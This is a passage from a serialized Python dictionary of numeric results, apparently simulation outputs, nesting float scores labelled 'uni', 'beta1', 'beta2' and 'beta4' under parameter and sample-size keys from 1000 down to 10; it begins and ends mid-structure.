0.24645011563196215, 'beta1': 0.060091771835968005, 'beta2': 0.4754042570886038, 'beta4': [0.029688920539531042, 1.0479568249986413]}, 30: {'uni': 0.28440873282543555, 'beta1': 0.109482940639056, 'beta2': 0.549994604048401, 'beta4': [0.04505001011774477, 1.037756617970666]}, 20: {'uni': 0.3850513892674541, 'beta1': 0.18201980352057348, 'beta2': 0.60256622468304, 'beta4': [0.06367752118379469, 1.0351258834952837]}, 10: {'uni': 0.5628533038813214, 'beta1': 0.3407017594138133, 'beta2': 0.7477263579938394, 'beta4': [0.09592116572544965, 1.022312456228958]}}, 200: {1000: {'uni': 0.051601596152469564, 'beta1': 0.006491242570563972, 'beta2': 0.3164865095370956, 'beta4': [0.008515436068305947, 1.2250561343578927]}, 750: {'uni': 0.05613472283253878, 'beta1': 0.006185240425682315, 'beta2': 0.3200056117230271, 'beta4': [0.009431110687418993, 1.1808048095372374]}, 500: {'uni': 0.05414951218228231, 'beta1': 0.005424286099782189, 'beta2': 0.2896123389973014, 'beta4': [0.008729410861757693, 1.156445325855722]}, 400: {'uni': 0.059769732308283904, 'beta1': 0.007709482270162348, 'beta2': 0.3211568642021472, 'beta4': [0.00943841263293194, 1.1436174420814718]}, 300: {'uni': 0.0671236882849256, 'beta1': 0.013165057157040751, 'beta2': 0.3074804572409215, 'beta4': [0.008674766530753029, 1.1551805439752956]}, 200: {'uni': 0.05940380948969049, 'beta1': 0.008940837305905933, 'beta2': 0.3068678000469144, 'beta4': [0.008468628870642946, 1.1144914248339726]}, 150: {'uni': 0.07051256848164812, 'beta1': 0.01231387540113938, 'beta2': 0.3734112375168418, 'beta4': [0.011635530187338912, 1.1102344418624115]}, 100: {'uni': 0.1282684380789726, 'beta1': 0.016640339898161893, 'beta2': 0.39116647758434087, 'beta4': [0.017474878824371418, 1.0990514429552851]}, 75: {'uni': 0.1388309766758086, 'beta1': 0.025448616151534417, 'beta2': 0.45250946908108447, 'beta4': [0.023311701330211987, 1.083242075394765]}, 50: {'uni': 0.17657749869850825, 'beta1': 0.06590868264165664, 'beta2': 0.48642256198348116, 'beta4': [0.028818054716693024, 1.0722919065661418]}, 30: {'uni': 0.32013439830903245, 'beta1': 0.11118974873831032, 'beta2': 0.5613232063927698, 'beta4': [0.04081080838254353, 1.0552597162547668]}, 20: {'uni': 0.38424963752626534, 'beta1': 0.17660282729028604, 'beta2': 0.593322847020505, 'beta4': [0.05494264637722776, 1.0459229007658148]}, 10: {'uni': 0.5184288204086329, 'beta1': 0.38782813410673844, 'beta2': 0.7328305414558911, 'beta4': [0.08660308646383802, 1.0377583841616613]}}, 150: {1000: {'uni': 0.06880107878218425, 'beta1': 0.009598485908326378, 'beta2': 0.3197001858692086, 'beta4': [0.0115533026707448, 1.2515620374494822]}, 750: {'uni': 0.0671538349318563, 'beta1': 0.014647157229541262, 'beta2': 0.375933792122322, 'beta4': [0.014940923590390768, 1.2659371027967505]}, 500: {'uni': 0.07579941138021336, 'beta1': 0.013754198701614238, 'beta2': 0.39570733064249597, 'beta4': [0.014561840496955112, 1.2086766334984447]}, 400: {'uni': 0.0847281819234035, 'beta1': 0.008910478557270205, 'beta2': 0.3666666885993351, 'beta4': [0.012852767161018493, 1.2068807776896686]}, 300: {'uni': 0.08275727613852064, 'beta1': 0.009015687407474727, 'beta2': 0.3471630079992819, 'beta4': [0.012103178530792815, 1.1972581680617507]}, 200: {'uni': 0.0699359902862645, 'beta1': 0.009384943893264627, 'beta2': 0.3269694126933192, 'beta4': [0.011187014417355612, 1.1810564835980994]}, 150: {'uni': 0.08068630534099007, 'beta1': 0.013117986655350801, 'beta2': 0.3822122264853986, 'beta4': [0.013664905276287356, 1.1479655026499307]}, 100: {'uni': 0.10274077669371745, 'beta1': 0.02514437513488057, 'beta2': 0.38582280171054567, 'beta4': [0.015032971481420694, 1.1365471408564738]}, 75: {'uni': 0.1348170016638727, 'beta1': 0.03443745035471468, 'beta2': 0.4157108199307209, 'beta4': [0.01875505481793789, 1.1127844118652421]}, 50: {'uni': 0.19293945781097221, 'beta1': 0.054828889323951385, 'beta2': 0.433458306476045, 'beta4': [0.03510746977521885, 1.0896411928401573]}, 30: {'uni': 0.2898196959850388, 'beta1': 0.11828649409279716, 'beta2': 0.519891016190952, 'beta4': [0.04140751936809961, 1.0735803416018648]}, 20: {'uni': 0.3761111120943085, 'beta1': 0.1860423597466752, 'beta2': 0.6015283358377184, 'beta4': [0.05855148221335893, 1.069790984842932]}, 10: {'uni': 0.5740144616695647, 'beta1': 0.3906152950549322, 'beta2': 0.743599714948697, 'beta4': [0.08689760856128591, 1.050307480515673]}}, 100: {1000: {'uni': 0.10099521848726027, 'beta1': 0.026645236836375326, 'beta2': 0.4561009377668412, 'beta4': [0.021664452129982456, 1.392173473496957]}, 750: {'uni': 0.1129539961558924, 'beta1': 0.0213008367839638, 'beta2': 0.5636820614328856, 'beta4': [0.025867002400168083, 1.3748477673872852]}, 500: {'uni': 0.13246151241247883, 'beta1': 0.017762693718526533, 'beta2': 0.4066575501194243, 'beta4': [0.02093940465927965, 1.379384860789293]}, 400: {'uni': 0.11017063968512505, 'beta1': 0.023890314699091485, 'beta2': 0.3877834593983558, 'beta4': [0.019903776791393917, 1.3299478081944538]}, 300: {'uni': 0.16846581725687973, 'beta1': 0.021247654758048126, 'beta2': 0.3876626946907388, 'beta4': [0.017170755289126795, 1.3070608648942346]}, 200: {'uni': 0.11450225522323053, 'beta1': 0.03447492619969185, 'beta2': 0.43616025388644963, 'beta4': [0.019008447347663, 1.2556973492967485]}, 150: {'uni': 0.13539117909597762, 'beta1': 0.020847767798978102, 'beta2': 0.5426589645895388, 'beta4': [0.02008844669853126, 1.212436060212826]}, 100: {'uni': 0.12395958532813696, 'beta1': 0.026023867138296748, 'beta2': 0.41567054621152966, 'beta4': [0.016312695398788834, 1.1934267130464744]}, 75: {'uni': 0.14958491655531964, 'beta1': 0.031328587828317545, 'beta2': 0.43539171455677583, 'beta4': [0.024389470944773287, 1.18591210476864]}, 50: {'uni': 0.20866608846080864, 'beta1': 0.0738343960442376, 'beta2': 0.46150269335210786, 'beta4': [0.03578478824558125, 1.1375845053243308]}, 30: {'uni': 0.2765100135009761, 'beta1': 0.10827097512399869, 'beta2': 0.5373945228642734, 'beta4': [0.04369745106389154, 1.127526956638849]}, 20: {'uni': 0.3823407507282141, 'beta1': 0.1999235052735679, 'beta2': 0.6038440766159979, 'beta4': [0.05885220974852782, 1.1023317863265667]}, 10: {'uni': 0.5298206414110227, 'beta1': 0.35708844112316296, 'beta2': 0.7239655162112311, 'beta4': [0.09086303269946881, 1.0771590457606335]}}, 75: {1000: {'uni': 0.16101820508997058, 'beta1': 0.0392663030910949, 'beta2': 0.5955010581399385, 'beta4': [0.028166682841671876, 1.4850878870706135]}, 750: {'uni': 0.13400430917278547, 'beta1': 0.05186636043863356, 'beta2': 0.47891299647806207, 'beta4': [0.023805416421474473, 1.5109324828309596]}, 500: {'uni': 0.15033015022241447, 'beta1': 0.03498316710360079, 'beta2': 0.5770284290238726, 'beta4': [0.023372147158943823, 1.4093787391715362]}, 400: {'uni': 0.1531914829080008, 'beta1': 0.03781775380753009, 'beta2': 0.48308220257966694, 'beta4': [0.026036202653387366, 1.3894387213434034]}, 300: {'uni': 0.140096050494891, 'beta1': 0.047058302826873004, 'beta2': 0.48763956543855647, 'beta4': [0.025154254231467974, 1.3428703157935498]}, 200: {'uni': 0.1695800443031254, 'beta1': 0.03248996820371958, 'beta2': 0.4993172041736475, 'beta4': [0.02447051797136617, 1.3717654226221188]}, 150: {'uni': 0.1746878943796265, 'beta1': 0.03620855583816983, 'beta2': 0.43462449526898567, 'beta4': [0.027158912702479637, 1.287118609178937]}, 100: {'uni': 0.17674936395333152, 'beta1': 0.04584363097014311, 'beta2': 0.5011652752537196, 'beta4': [0.023203397617561898, 1.281352064318893]}, 75: {'uni': 0.16666336190194875, 'beta1': 0.043759999233142555, 'beta2': 0.5854013951049823, 'beta4': [0.025734039291296158, 1.2513099214564491]}, 50: {'uni': 0.19778123745684092, 'beta1': 0.05857582115085566, 'beta2': 0.6491458878476999, 'beta4': [0.027734464855309886, 1.2186804525897197]}, 30: {'uni': 0.2908349398537664, 'beta1': 0.12303564804929479, 'beta2': 0.6579127634146081, 'beta4': [0.03925267307683, 1.1786830486510413]}, 20: {'uni': 0.3870059702226258, 'beta1': 0.1638510250315426, 'beta2': 0.6204378214586946, 'beta4': [0.06209409909141029, 1.1517104578692603]}, 10: {'uni': 0.5355522101172704, 'beta1': 0.35408050675108815, 'beta2': 0.7285108013888837, 'beta4': [0.08430842704984991, 1.097394751106502]}}, 50: {1000: {'uni': 0.22424609164297443, 'beta1': 0.10025843798909305, 'beta2': 0.6109226727203947, 'beta4': [0.03924165854902822, 1.6267421226716416]}, 750: {'uni': 0.2537903023335899, 'beta1': 0.07416880769129822, 'beta2': 0.5080375269871897, 'beta4': [0.03314676909701872, 1.5589018573309383]}, 500: {'uni': 0.23308360263225839, 'beta1': 0.09163661437479734, 'beta2': 0.5477035534119664, 'beta4': [0.034651811631448516, 1.4984262997193514]}, 400: {'uni': 0.2135555660715244, 'beta1': 0.10738424676399555, 'beta2': 0.7301181390917937, 'beta4': [0.044360696665479454, 1.5793090007440191]}, 300: {'uni': 0.20845412309578348, 'beta1': 0.07774222049722822, 'beta2': 0.5953760006140618, 'beta4': [0.03279491280419391, 1.627027852109703]}, 200: {'uni': 0.24319321692664747, 'beta1': 0.13124268707554892, 'beta2': 0.6370589117638976, 'beta4': [0.03790435948557217, 1.4455538593119952]}, 150: {'uni': 0.2376511481632187, 'beta1': 0.07273309414631492, 'beta2': 0.544820369601891, 'beta4': [0.05862998404005149, 1.4572932486873187]}, 100: {'uni': 0.29513109730105114, 'beta1': 0.08860359124141814, 'beta2': 0.5285161783868962, 'beta4': [0.038192643880053403, 1.3806124902781127]}, 75: {'uni': 0.2749288556572405, 'beta1': 0.13174377627922593, 'beta2': 0.7017994016865113, 'beta4': [0.03527787509171762, 1.372290745982181]}, 50: {'uni': 0.2543344897457348, 'beta1': 0.09211055678263366, 'beta2': 0.7093382651151694, 'beta4': [0.036485429499135996, 1.2745825598839697]}, 30: {'uni': 0.2927948306959651, 'beta1': 0.13810074460874613, 'beta2': 0.6809517549251869, 'beta4': [0.03995430405381426, 1.2517503144067612]}, 20: {'uni': 0.37086983572719695, 'beta1': 0.19185529125873838, 'beta2': 0.6183400380730043, 'beta4': [0.056908678575848075, 1.201276519869532]}, 10: {'uni': 0.5357005611311981, 'beta1': 0.3557142999459758, 'beta2': 0.7117358313845611, 'beta4': [0.08832001083612763, 1.1772531157292991]}}, 30: {1000: {'uni': 0.5375517058914333, 'beta1': 0.18682553850708347, 'beta2': 0.9623725671332998, 'beta4': [0.05111006116199637, 2.1284403063269264]}, 750: {'uni': 0.3577356511491193, 'beta1': 0.2793514883989638, 'beta2': 1.0975406538160377, 'beta4': [0.07097824896206201, 1.9871758843512004]}, 500: {'uni': 0.702141698978866, 'beta1': 0.26555631462924306, 'beta2': 0.9740832893485976, 'beta4': [0.05511187550828117, 1.9841038060295242]}, 400: {'uni': 0.5145446263289309, 'beta1': 0.25794540644995834, 'beta2': 0.828981279891515, 'beta4': [0.06082742626722804, 1.9147202001621995]}, 300: {'uni': 0.4711936487014286, 'beta1': 0.1868542186385208, 'beta2': 0.833463071793256, 'beta4': [0.06651105115357443, 1.97384106365458]}, 200: {'uni': 0.4663956914615083, 'beta1': 0.35256215108473493, 'beta2': 0.8182432862218997, 'beta4': [0.06304111167477797, 1.844645269837164]}, 150: {'uni': 0.433320385683165, 'beta1': 0.2102749321540168, 'beta2': 0.8212444381853243, 'beta4': [0.06040506583522945, 1.7983824565568507]}, 100: {'uni': 0.3812474998448387, 'beta1': 0.22786614409158085, 'beta2': 0.9538255457719403, 'beta4': [0.06026497731561029, 1.7234749363367283]}, 75: {'uni': 0.40094360554599134, 'beta1': 0.23875103233048597, 'beta2': 0.7715118646556511, 'beta4': [0.062243334302248675, 1.6706938143747165]}, 50: {'uni': 0.5023984324782755, 'beta1': 0.21032346823013254, 'beta2': 0.8476224401417406, 'beta4': [0.05376929125174212, 1.5076303475283628]}, 30: {'uni': 0.5022316018535551, 'beta1': 0.19211174291043182, 'beta2': 0.9852383031978549, 'beta4': [0.055882813612441865, 1.5053037754614005]}, 20: {'uni': 0.42257652007685287, 'beta1': 0.2648788987026799, 'beta2': 1.0097366578988298, 'beta4': [0.05212870119742689, 1.3587734455424478]}, 10: {'uni': 0.5752945517368767, 'beta1': 0.3824332965187248, 'beta2': 1.1642452986239304, 'beta4': [0.09422116258863913, 1.2546417636878537]}}, 20: {1000: {'uni': 0.8245658279493084, 'beta1': 0.6714293037543387, 'beta2': 1.1403508046288549, 'beta4': [0.08965514010313543, 2.355993522309204]}, 750: {'uni': 0.7522973791112813, 'beta1': 0.5001791028253899, 'beta2': 1.9167065498955769, 'beta4': [0.08700394872889188, 2.606628099310203]}, 500: {'uni': 0.6830218938900532, 'beta1': 0.5669378077763796, 'beta2': 1.3620749239695735, 'beta4': [0.09055668995699578, 2.324014882888129]}, 400: {'uni': 0.6717027010335322, 'beta1': 0.5881516513277326, 'beta2': 1.2381092252485557, 'beta4': [0.08982533008390195, 2.871104248026336]}, 300: {'uni': 0.7200071531914536, 'beta1': 0.5639971175195339, 'beta2': 1.2954861108358184, 'beta4': [0.10664037978442996, 2.513620523930525]}, 200: {'uni': 0.5904276032048987, 'beta1': 0.4988005660867027, 'beta2': 1.0996965576942577, 'beta4': [0.07945828546825576, 2.403024638109359]}, 150: {'uni': 0.6221222720189126, 'beta1': 0.594144837149773, 'beta2': 1.1617999336669014, 'beta4': [0.1009825524269249, 2.206361430979434]}, 100: {'uni': 0.6143584688855093, 'beta1': 0.5096177815955042, 'beta2': 1.2546626538685803, 'beta4': [0.08413959400017983, 2.0981666855413628]}, 75: {'uni': 0.8785772478481102, 'beta1': 0.437936732164422, 'beta2': 1.2111561571681346, 'beta4': [0.09396307393791267, 2.359982618370008]}, 50: {'uni': 0.7025752082031005, 'beta1': 0.7186578378289812, 'beta2': 1.2601942541642712, 'beta4': [0.10511632552075476, 1.9884553426902782]}, 30: {'uni': 0.5810201916470588, 'beta1': 0.5995612994384831, 'beta2': 1.4948812858640488, 'beta4': [0.10689852453889333, 1.718598639290735]}, 20: {'uni': 0.6559192165274909, 'beta1': 0.6258327950669433, 'beta2': 1.3153066332074126, 'beta4': [0.08394879019729243, 1.73085600993384]}, 10: {'uni': 0.7114215669900594, 'beta1': 0.5110631063073926, 'beta2': 1.1962015407227755, 'beta4': [0.09298919262453555, 1.540883640483407]}}, 10: {1000: {'uni': 1.9583677469218963, 'beta1': 2.576333617343919, 'beta2': 2.461211967994449, 'beta4': [0.19243838699722618, 3.779369929492513]}, 750: {'uni': 1.938215880657949, 'beta1': 5.391824254480648, 'beta2': 2.6331851083484, 'beta4': [0.21832884837162334, 5.159307970428041]}, 500: {'uni': 2.085024738289965, 'beta1': 3.5133109540444565, 'beta2': 2.382220369676619, 'beta4': [0.16933641621151063, 4.311941729154879]}, 400: {'uni': 2.3249797168528294, 'beta1': 2.0137087338200947, 'beta2': 6.012764801850701, 'beta4': [0.17567403680412053, 3.5548840861243423]}, 300: {'uni': 3.3198326153076034, 'beta1': 2.4070810291499973, 'beta2': 3.717530102940286, 'beta4': [0.19086555116543857, 3.349825429053164]}, 200: {'uni': 2.0254293672943193, 'beta1': 2.299309830454076, 'beta2': 2.7160076476196853, 'beta4': [0.20201006223755733, 5.303158103378205]}, 150: {'uni': 3.282500960658318, 'beta1': 2.1207065638469773, 'beta2': 1.9410779695397329, 'beta4': [0.14779914391992724, 4.172672748245124]}, 100: {'uni': 1.7067606545068066, 'beta1': 2.6790345925314645, 'beta2': 2.642466168596247, 'beta4': [0.17375693292954014, 3.7555270616484635]}, 75: {'uni': 2.1111537004767342, 'beta1': 2.1926293662494176, 'beta2': 2.644392554644403, 'beta4': [0.16479647222509328, 4.265566144423463]}, 50: {'uni': 2.4816574374593925, 'beta1': 3.225545355279228, 'beta2': 2.427281968416075, 'beta4': [0.21343736012593248, 3.8444544657885107]}, 30: {'uni': 3.1974645398096033, 'beta1': 2.009092390657058, 'beta2': 3.3306193769470287, 'beta4': [0.18325118281932046, 3.195752438854362]}, 20: {'uni': 2.311115457162956, 'beta1': 2.438462691037925, 'beta2': 2.317809029574652, 'beta4': [0.1619449311199175, 2.72060854124639]}, 10: {'uni': 1.860495572909103, 'beta1': 2.4763788602224275, 'beta2': 2.7556546342359924, 'beta4': [0.16743973925875363, 3.272261832564597]}}}, 0.3: {1000: {1000: {'uni': 0.012795174678120393, 'beta1': 0.0002679565864041922, 'beta2': 0.18742635617723044, 'beta4': [0.0017826444891534108, 1.0522042104131124]}, 750: {'uni': 0.018336935363620903, 'beta1': 0.0004754746110374862, 'beta2': 0.18408175297923784, 'beta4': [0.002563961983437563, 1.043912703454493]}, 500: {'uni': 0.023414907512510984, 'beta1': 0.0008285030084488381, 'beta2': 0.21392690782659204, 'beta4': [0.0033738177625835283, 1.0394032441990042]}, 400: {'uni': 0.03177120193768, 'beta1': 0.0019733869982122105, 'beta2': 0.2467648002510673, 'beta4': [0.004811261032941804, 1.033240580519976]}, 300: {'uni': 0.03815290820877515, 'beta1': 0.002748482329194836, 'beta2': 0.2727747044827896, 'beta4': [0.007856020418320583, 1.0290961116997555]}, 200: {'uni': 0.08507691017511126, 'beta1': 0.004948573058538693, 'beta2': 0.3011091377193825, 'beta4': [0.009638805999161303, 1.0242636316798672]}, 150: {'uni': 0.07472797369113161, 'beta1': 0.01904392003417618, 'beta2': 0.337378405759772, 'beta4': [0.010533899245420439, 1.0217123696885337]}, 100: {'uni': 0.11077744339928126, 'beta1': 0.01920778151803272, 'beta2': 0.40483316774024947, 'beta4': [0.01789711695444819, 1.018186238923615]}, 75: {'uni': 0.11990949678305865, 'beta1': 0.029631460430197737, 'beta2': 0.4499087467731683, 'beta4': [0.028082405545207613, 1.0150370158274151]}, 50: {'uni': 0.19372523646892206, 'beta1': 0.06105398151552832, 'beta2': 0.49624656830731617, 'beta4': [0.03241573448860706, 1.0149051848586808]}, 30: {'uni': 0.28264799923765627, 'beta1': 0.10436396811276909, 'beta2': 0.5513000690922769, 'beta4': [0.043785922945529736, 1.0104075965139894]}, 20: {'uni': 0.35244841088708184, 'beta1': 0.15811742222657982, 'beta2': 0.6484490905373989, 'beta4': [0.053071394096319016, 1.0091627612927796]}, 10: {'uni': 0.5663818741625132, 'beta1': 0.32324795092972336, 'beta2': 0.7377822567041101, 'beta4': [0.08935636518216408, 1.007346648489344]}}, 750: {1000: {'uni': 0.014485201643862624, 'beta1': 0.0006629138723885677, 'beta2': 0.19299740873601873, 'beta4': [0.0029912098349708974, 1.0635084767551528]}, 750: {'uni': 0.016020228660910164, 'beta1': 0.00044792258619544436, 'beta2': 0.20362324734215456, 'beta4': [0.0028190004783775315, 1.0553314938332476]}, 500: {'uni': 0.019975736604073733, 'beta1': 0.0009383156184602303, 'beta2': 0.21272444569670917, 'beta4': [0.00389143518085255, 1.0465923539174913]}, 400: {'uni': 0.031365488090823956, 'beta1': 0.0020041954646797533, 'beta2': 0.22929318942136415, 'beta4': [0.004484087249726235, 1.0438364985477657]}, 300: {'uni': 0.04640849666921278, 'beta1': 0.0024450870414352735, 'beta2': 0.27450264141297454, 'beta4': [0.006205938298724309, 1.0385476373907243]}, 200: {'uni': 0.06093139793221171, 'beta1': 0.005970997391722452, 'beta2': 0.30214900952475965, 'beta4': [0.009566235751639111, 1.031822806243974]}, 150: {'uni': 0.07407127426735613, 'beta1': 0.011762584862298439, 'beta2': 0.34520256227724017, 'beta4': [0.013083866983431237, 1.0276022904521596]}, 100: {'uni': 0.1049528175541805, 'beta1': 0.02650540954490502, 'beta2': 0.3999251150350931, 'beta4': [0.01622328062265029, 1.029934149910967]}, 75: {'uni': 0.13773478941322262, 'beta1': 0.030231711864218847, 'beta2': 0.4443294917949243, 'beta4': [0.020382021855895858, 1.0225043552068545]}, 50: {'uni': 0.18860277419001642, 'beta1': 0.048683316697604964, 'beta2': 0.5017857392818516, 'beta4': [0.030640384132032683, 1.0175511796414718]}, 30: {'uni': 0.274229496564352, 'beta1': 0.10553107700842067, 'beta2': 0.6047299624940808, 'beta4': [0.04159495872030207, 1.013590583317765]}, 20: {'uni': 0.3311173740302474, 'beta1': 0.18025665597220492, 'beta2': 0.6559673224772654, 'beta4': [0.05677363500512058, 1.0111469897526215]}, 10: {'uni': 0.5503083494942063, 'beta1': 0.3378803618674342, 'beta2': 0.7382975365394384, 'beta4': [0.08012641482289543, 1.007993647568211]}}, 500: {1000: {'uni': 0.020087175565086567, 'beta1': 0.0013935125324983928, 'beta2': 0.21141747412315226, 'beta4': [0.0032526585097433225, 1.0923841201536304]}, 750: {'uni': 0.023119803219004583, 'beta1': 0.0014919615457760513, 'beta2': 0.2215561352923942, 'beta4': [0.0036458796217003326, 1.083706733679476]}, 500: {'uni': 0.02634673909588432, 'beta1': 0.0012884012398439958, 'beta2': 0.22853225772196686, 'beta4': [0.0038840363233813725, 1.070851191946351]}, 400: {'uni': 0.027863611247881087, 'beta1': 0.0019548832749742423, 'beta2': 0.2660337820317211, 'beta4': [0.006843790543473078, 1.0660486796885624]}, 300: {'uni': 0.04195199023609443, 'beta1': 0.005604419821151305, 'beta2': 0.2673400467917025, 'beta4': [0.005845307042980669, 1.0610970046028447]}, 200: {'uni': 0.060425411269776755, 'beta1': 0.004629539818339217, 'beta2': 0.33400473721899254, 'beta4': [0.009584650972333094, 1.045076938855807]}, 150: {'uni': 0.07429990877171826, 'beta1': 0.009017861104543, 'beta2': 0.31564503571293595, 'beta4': [0.012220242128090822, 1.047639871284981]}, 100: {'uni': 0.10052225463410921, 'beta1': 0.01956089088384902, 'beta2': 0.36499669372521054, 'beta4': [0.015972577920426997, 1.0341821005789347]}, 75: {'uni': 0.13303851391596935, 'beta1': 0.03598466037575139, 'beta2': 0.4319783884267612, 'beta4': [0.023312914741063458, 1.0320364684089665]}, 50: {'uni': 0.16924151473552013, 'beta1': 0.05098263622341181, 'beta2': 0.47987054682960817, 'beta4': [0.030628113292411226, 1.0253445151693896]}, 30: {'uni': 0.2730853650116837, 'beta1': 0.11958830964796402, 'beta2': 0.5763957024769127, 'beta4': [0.044802580459368586, 1.021053806102985]}, 20: {'uni': 0.34877051560558964, 'beta1': 0.1774726992994486, 'beta2': 0.596517800478609, 'beta4': [0.05608609680158825, 1.0178953367755723]}, 10: {'uni': 0.5382064508681208, 'beta1': 0.34840656929213076, 'beta2': 0.7391836182227792, 'beta4': [0.08303014814835374, 1.0146320825991233]}}, 400: {1000: {'uni': 0.026209806342155622, 'beta1': 0.0012528034498248254, 'beta2': 0.23529367745856108, 'beta4': [0.004320805230985572, 1.112419848894135]}, 750: {'uni': 0.026109204738674938, 'beta1': 0.0015676344082384457, 'beta2': 0.22068244545328733, 'beta4': [0.004474057841167138, 1.094215835056832]}, 500: {'uni': 0.029454600480680656, 'beta1': 0.001397911455226279, 'beta2': 0.24122137931570758, 'beta4': [0.003996336121194239, 1.0858975355177618]}, 400: {'uni': 0.0299979365013004, 'beta1': 0.0016324361130554963, 'beta2': 0.25514254631092853, 'beta4': [0.005012661134952242, 1.075586195091313]}, 300: {'uni': 0.04106239413269716, 'beta1': 0.00265492909809163, 'beta2': 0.2676813799664323, 'beta4': [0.00574872945436531, 1.0777848197004376]}, 200: {'uni': 0.07010191864996612, 'beta1': 0.007739385258328493, 'beta2': 0.28844627964158687, 'beta4': [0.009606054283202024, 1.0623623041267098]}, 150: {'uni': 0.07548793732876151, 'beta1': 0.007173838150662292, 'beta2': 0.31944202255614057, 'beta4': [0.010475083204453681, 1.0535667495755432]}, 100: {'uni': 0.13012977421092564, 'beta1': 0.01950906919380695, 'beta2': 0.38456733938185056, 'beta4': [0.014565591838886616, 1.0444994537785801]}, 75: {'uni': 0.12879610969461608, 'beta1': 0.03316885761904827, 'beta2': 0.4344096694228591, 'beta4': [0.02186931697757683, 1.0417307188802103]}, 50: {'uni': 0.19587048133869084, 'beta1': 0.06726717689172765, 'beta2': 0.4837317952295418, 'beta4': [0.03044567966820428, 1.0316798043768414]}, 30: {'uni': 0.2885105758490185, 'beta1': 0.09253031031163511, 'beta2': 0.5426595128852456, 'beta4': [0.044357799095975335, 1.0277129264951208]}, 20: {'uni': 0.3423360016646393, 'beta1': 0.15320983210606476, 'beta2': 0.6150709939528051, 'beta4': [0.06269025330982703, 1.0238961558784514]}, 10: {'uni': 0.5638941332248057, 'beta1': 0.34883930616627784, 'beta2': 0.732850978191352, 'beta4': [0.08097781812359789, 1.0183696008339012]}}, 300: {1000: {'uni': 0.03697391950538826, 'beta1': 0.0037587290091272542, 'beta2': 0.2941880452433283, 'beta4': [0.0062970688023370105, 1.140943658481785]}, 750: {'uni': 0.04459852541100737, 'beta1': 0.002386072912073571, 'beta2': 0.2659829977334984, 'beta4': [0.007119765549883499, 1.1206843223162462]}, 500: {'uni': 0.0357683843109935, 'beta1': 0.0027726863173718644, 'beta2': 0.23609524241025398, 'beta4': [0.005949250566485548, 1.1125558721619353]}, 400: {'uni': 0.03435278048786573, 'beta1': 0.002906613367063174, 'beta2': 0.30866043135716725, 'beta4': [0.006143500069286727, 1.1107577665751034]}, 300: {'uni': 0.045849196840483344, 'beta1': 0.004380918345796293, 'beta2': 0.2771671252127634, 'beta4': [0.006634063460291386, 1.087017134330869]}, 200: {'uni': 0.053859418965440456, 'beta1': 0.0062719069457408405, 'beta2': 0.2963923468974883, 'beta4': [0.008099159991741616, 1.0792869480721894]}, 150: {'uni': 0.07066337263399719, 'beta1': 0.008736997723679881, 'beta2': 0.3251019472842105, 'beta4': [0.013913289456289137, 1.0683038989936084]}, 100: {'uni': 0.09981841785248288, 'beta1': 0.025440638493153908, 'beta2': 0.3966524688792758, 'beta4': [0.01605404277263024, 1.0652860963007686]}, 75: {'uni': 0.15105316789466477, 'beta1': 0.03915037732452085, 'beta2': 0.41626942092060754, 'beta4': [0.02191579411280009, 1.0523909796365454]}, 50: {'uni': 0.17484256812179605, 'beta1': 0.04497383262749608, 'beta2': 0.45572339594264294, 'beta4': [0.02820511965000463, 1.0452251008842077]}, 30: {'uni': 0.2606590603145417, 'beta1': 0.11969227776465383, 'beta2': 0.5252303693074646, 'beta4': [0.038352104328644714, 1.0348049324704034]}, 20: {'uni': 0.3856413645220924, 'beta1': 0.15140885200484566, 'beta2': 0.6319959664924306, 'beta4': [0.05857015440594212, 1.027654094293965]}, 10: {'uni': 0.5118825279100839, 'beta1': 0.3335710648200135, 'beta2': 0.741387039678667, 'beta4': [0.0859932696959542, 1.024719711098674]}}, 200: {1000: {'uni': 0.05151262491969304, 'beta1': 0.00557100210213531, 'beta2': 0.2668825327634389, 'beta4': [0.010538893374802173, 1.2171655533105397]}, 750: {'uni': 0.05469553492358907, 'beta1': 0.004833789083975562, 'beta2': 0.26489777149823035, 'beta4': [0.010722773184482691, 1.1960517300553821]}, 500: {'uni': 0.04775042790856262, 'beta1': 0.006652995919308116, 'beta2': 0.36021257322332423, 'beta4': [0.008695745069049706, 1.164928412055601]}, 400: {'uni': 0.057334009996901324, 'beta1': 0.004294613400485525, 'beta2': 0.371033028200585, 'beta4': [0.010031180328761704, 1.1501078191012866]}, 300: {'uni': 0.049684597811366665, 'beta1': 0.008499359150427318, 'beta2': 0.29613841935914803, 'beta4': [0.008837488922880181, 1.1231549228365025]}, 200: {'uni': 0.05832825272371185, 'beta1': 0.006697516279795657, 'beta2': 0.39511479851856224, 'beta4': [0.010047397962625848, 1.1181052008643884]}, 150: {'uni': 0.07777153033124701, 'beta1': 0.00900622480430151, 'beta2': 0.3840383315171673, 'beta4': [0.010868672609946542, 1.1055624437674316]}, 100: {'uni': 0.10446273882750046, 'beta1': 0.023086612022459412, 'beta2': 0.3554307967400825, 'beta4': [0.015850124282086046, 1.095887178493004]}, 75: {'uni': 0.1288379259227677, 'beta1': 0.03193365062395732, 'beta2': 0.41758773246133707, 'beta4': [0.019077099325128966, 1.0819065772828271]}, 50: {'uni': 0.20019589133880328, 'beta1': 0.05460579112418594, 'beta2': 0.4492824362223685, 'beta4': [0.03136538729573724, 1.0634108603370227]}, 30: {'uni': 0.2989964472722316, 'beta1': 0.10790396387551246, 'beta2': 0.518601566315402, 'beta4': [0.04157241281091631, 1.0527079106127977]}, 20: {'uni': 0.37471304310660425, 'beta1': 0.18583949748603418, 'beta2': 0.6021024278440756, 'beta4': [0.05749272265644228, 1.043381326439097]}, 10: {'uni': 0.527570467729745, 'beta1': 0.3603215508845803, 'beta2': 0.7131220771053172, 'beta4': [0.08533707841915919, 1.0350030516769588]}}, 150: {1000: {'uni': 0.07052889039205126, 'beta1': 0.010024200840333964, 'beta2': 0.3083261123837317, 'beta4': [0.013526285671768778, 1.2478637545541533]}, 750: {'uni': 0.0860726015615848, 'beta1': 0.010380529900627569, 'beta2': 0.30599740090325434, 'beta4': [0.012540685650418876, 1.2286531319506213]}, 500: {'uni': 0.0654006630277639, 'beta1': 0.008681664379906905, 'beta2': 0.45441420543986255, 'beta4': [0.011738965264343941, 1.2046107993328228]}, 400: {'uni': 0.07018607099380372, 'beta1': 0.020538750971438955, 'beta2': 0.3401951193202403, 'beta4': [0.010482953670016155, 1.1967410973771544]}, 300: {'uni': 0.07906994258517838, 'beta1': 0.012765196487756798, 'beta2': 0.3473319166630782, 'beta4': [0.012960970621760944, 1.186784276574822]}, 200: {'uni': 0.07687044506402128, 'beta1': 0.009009790251886841, 'beta2': 0.390321852263401, 'beta4': [0.016054629934173753, 1.1614077237409302]}, 150: {'uni': 0.08234029556315943, 'beta1': 0.014170771965552609, 